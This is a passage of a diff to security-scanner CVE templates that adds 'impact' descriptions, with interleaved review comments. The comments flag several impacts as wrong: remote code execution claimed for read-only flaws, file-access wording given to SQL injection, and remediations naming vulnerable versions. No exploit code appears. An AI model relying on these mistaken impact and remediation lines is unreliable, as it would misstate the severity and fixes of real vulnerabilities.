@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! website. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14017 diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index d750cd5c80..2fdf2d2cd2 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive data exposure, and remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14274 diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index cf8ddad9ab..2e6030ecb5 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml 
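Review bot: both hunks on this line (CVE-2010-2682 and CVE-2010-2857) promote the description's hedged "possibly have unspecified other impacts" into a definite "remote code execution", which the templates do not support; the CVE-2010-2857 line even lists it as a flat outcome alongside data exposure. Keep the hedge from the description, e.g. `Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and possibly other unspecified impacts.`, and reserve RCE wording for the templates whose descriptions actually say "include and execute".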
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/. + impact: | + This vulnerability can lead to unauthorized access to sensitive information and potential compromise of the affected system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 96cd1d53d3..6e8db16bbe 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. + impact: | + Remote file inclusion vulnerability in Joomla! Component Visites 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/31708 diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 9be091cbe4..b652d1b9a3 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml 
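Review bot: the impact line in the CVE-2010-2918 hunk restates the description almost word for word (down to the `mosConfig_absolute_path` parameter) instead of stating the consequence, and it introduces a third spelling of the product ("Joomla! Component Visites 1.1") next to the description's "Visites (com_joomla-visites) component 1.1 RC2". Replace it with a consequence-only sentence, e.g. `Successful exploitation allows an unauthenticated remote attacker to execute arbitrary PHP code on the web server, leading to full compromise of the Joomla! installation.` The CVE-2010-2861 hunk is fine.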
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to retrieve arbitrary files from the server. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14845 diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 3c38addf26..182c52d4cd 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14964 diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 9f54a500c0..c3cf338336 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml 
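Review bot: the impact line in the CVE-2010-3426 hunk understates the description: the description says attackers can "include and execute arbitrary local files" (a local file inclusion, not just a read), but the impact only mentions reading sensitive files. This is also inconsistent with the CVE-2010-2259 hunk earlier in this patch, whose identical "include and execute" description was given "potential remote code execution". Align the two, e.g. `Successful exploitation of this vulnerability allows an attacker to include and execute arbitrary local files, which can lead to disclosure of sensitive files and remote code execution.` The CVE-2010-3203 hunk is fine.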
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. + impact: | + An attacker can exploit this vulnerability to access sensitive files and directories on the camera. remediation: Upgrade to a supported product version. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-4231 diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index ee437547ef..e6ad3bf59c 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -5,6 +5,8 @@ info: author: 0x_akoko severity: critical description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: | Upgrade Tiki Wiki CMS Groupware to a version that is not affected by the CVE-2010-4239 vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index a4e9d21c96..9e1c6beb0a 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. + impact: | + An attacker can exploit this vulnerability to access sensitive files containing confidential information, such as configuration files or user credentials. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15643 diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index 75c9e2387b..44f7acd0ae 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15791 diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index 28f82304dc..44dc32c65e 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml 
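Review bot: the impact line in the CVE-2010-4282 hunk covers only the weakest of the three vectors in the description. The description says vectors (1) and (2) let attackers "include and execute arbitrary local files" and vector (3), the `layout` parameter to `operation/agentes/networkmap.php`, lets them "include and execute, create, modify, or delete arbitrary local files"; the impact mentions only reading configuration files and credentials. Extend it to cover code execution and file modification, e.g. `Successful exploitation of this vulnerability allows an attacker to include and execute arbitrary local files, and via networkmap.php to create, modify, or delete files on the server, which can lead to remote code execution and full compromise of the Pandora FMS host.` The CVE-2010-4617 hunk is fine.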
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to further compromise. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15749 diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index 14f22c3079..2fb2e3aec2 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15585 diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index ad78593d78..d6ed848688 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34250 diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index eea4df86bd..e1d981a840 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12601 diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 2b51c75d92..7d10092cc1 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml 
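Review bot: both hunks on this line describe SQL injection, but the impact lines reuse the directory-traversal wording from the neighbouring templates: CVE-2010-4977 says "unauthorized access to sensitive files, remote code execution" and CVE-2010-5028 says "unauthorized access to sensitive files". Neither description mentions files; both say the flaw lets remote attackers "execute arbitrary SQL commands". Rewrite both around the database, e.g. `Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL commands against the backend database, potentially reading or modifying its contents, including user credentials.` and drop the RCE claim, which nothing in the CVE-2010-4977 template supports.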
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Apply the latest patches and updates provided by MODx to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index 7d26a64bca..675c556226 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Arbitrary file inclusion leading to remote code execution remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34837 diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index 1cf893689a..b1df3b2328 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml 
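Review bot: the impact line in the CVE-2010-5286 hunk, `Arbitrary file inclusion leading to remote code execution`, is both unsupported and stylistically out of step with the rest of the patch. The description says the traversal lets attackers "read arbitrary files and possibly have unspecified other impacts", not include or execute them, and every other new impact value is a full sentence ending in a period. Suggest `Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and possibly other unspecified impacts.`; if the exploit-db reference really demonstrates inclusion rather than a read, the description (and the critical severity) should be updated to say so, and the impact should follow from that. The CVE-2010-5278 hunk is fine.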
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface. + impact: | + This vulnerability can lead to unauthorized access to sensitive files and data on the server. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/16103 diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 5595d42765..78fa577bc0 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. + impact: | + An attacker can read arbitrary files on the server, potentially leading to unauthorized access to sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 3fb06048f0..97807de981 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system. remediation: | Upgrade Chyrp to the latest version or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index 6cf391a790..407fec865a 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - http://www.justanotherhacker.com/advisories/JAHx113.txt diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index a9be84307a..320764f5e5 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml 
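Review bot: the impact line in the CVE-2011-2780 hunk appears to have been copied from the CVE-2011-2744 hunk directly above it. The 2744 description supports RCE ("include and execute arbitrary local files"), but the 2780 description is explicitly a read-only traversal in `includes/lib/gz.php` ("read arbitrary files via a .. (dot dot) in the file parameter") and even notes that it is "a different vulnerability than CVE-2011-2744". Limit the 2780 impact to file disclosure, e.g. `Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, potentially exposing sensitive information.`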
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049. + impact: | + An attacker can exploit this vulnerability to access sensitive files and directories on the affected system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36256 diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index 2386f992e0..b72d1f3978 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index 446f0cfe98..26b3454955 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + impact: | + Allows remote attackers to execute arbitrary script or HTML code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4618 diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 29a2aa9f8c..53f3d2871b 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4624 diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index 22b9d25e63..f3f45d2cf5 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + The vulnerability allows an attacker to include arbitrary local files, leading to unauthorized access to sensitive information or remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36598 diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 5e7c30dce0..e2e86f9683 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of Adminimize plugin (1.7.22) or apply the necessary patches to fix the XSS vulnerability. reference: diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 742dd8123d..85596ddc3d 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml 
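Review bot: the impact line in the CVE-2011-4804 hunk says the flaw lets an attacker "include arbitrary local files" with possible "remote code execution", but the description only says it allows remote attackers to "read arbitrary files" via the `controller` parameter, and the template carries a medium severity consistent with a read. Reword to file disclosure, e.g. `Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, potentially exposing sensitive information.` The CVE-2011-4926 hunk is fine and its remediation version (1.7.22) agrees with the description's "before 1.7.22".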
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the plugin (version 0.1.8 or higher) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index 8b93edda3b..2c0fdc0f60 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Alert Before Your Post plugin (0.1.1) or remove the plugin if it is not necessary for the website's functionality. reference: diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index f57c5b7698..18edcf1c1e 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml 
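Review bot: the two new impact lines on this line are fine, but while the `info` blocks are being touched the neighbouring remediation lines in the same hunks contradict their descriptions and should be fixed in the same pass. In CVE-2011-5106 the description says the plugin is vulnerable "before 0.1.7" while the remediation says to update to "version 0.1.8 or higher"; in CVE-2011-5107 the description marks "possibly 0.1.1 and earlier" as vulnerable while the remediation tells users to update to "the latest version of the Alert Before Your Post plugin (0.1.1)", i.e. to the vulnerable version. Either cite the actual fixed version or drop the parenthetical version numbers.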
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Skysa App Bar or apply appropriate security controls to sanitize user input and prevent XSS attacks. reference: diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 917c82bd28..6f84c6a265 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the ClickDesk Live Support Live Chat plugin to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index 42a43d48cf..bf12f57689 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter. + impact: | + An attacker can craft a malicious URL to redirect users to a malicious website, leading to phishing attacks. remediation: | Validate and sanitize user input for the 'ReturnUrl' parameter to prevent open redirect vulnerabilities. reference: diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 3e404ca69e..7211282430 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Featurific For WordPress plugin (1.6.2) or apply the vendor-supplied patch to fix the vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 6e96f6924b..b6ea58cfa0 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml 
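Review bot: the impact line in the CVE-2011-5265 hunk is fine, but the adjacent remediation line in the same hunk tells users to "Update to the latest version of the Featurific For WordPress plugin (1.6.2)", and 1.6.2 is exactly the version the description identifies as vulnerable. Since this change is already editing the `info` block, drop or correct the version in parentheses. The CVE-2011-5252 hunk (Orchard open redirect) is consistent with its description.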
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution on the affected server. remediation: Developers should immediately upgrade to at least Struts 2.3.18. reference: - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545 diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 6a669559e5..c586f899c4 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself." + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected server. remediation: | Upgrade Apache Struts to a version higher than 2.3.1.1 or apply the necessary patches. reference: diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index ec829749af..d47b70f7f3 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further compromise of the system. remediation: | Upgrade to a patched version of the Count Per Day plugin (version 3.2 or above) or apply the vendor-supplied patch to fix the path traversal vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 0e2e728709..e2e2cbade6 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index b33ab3000b..b59cd4315b 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml 
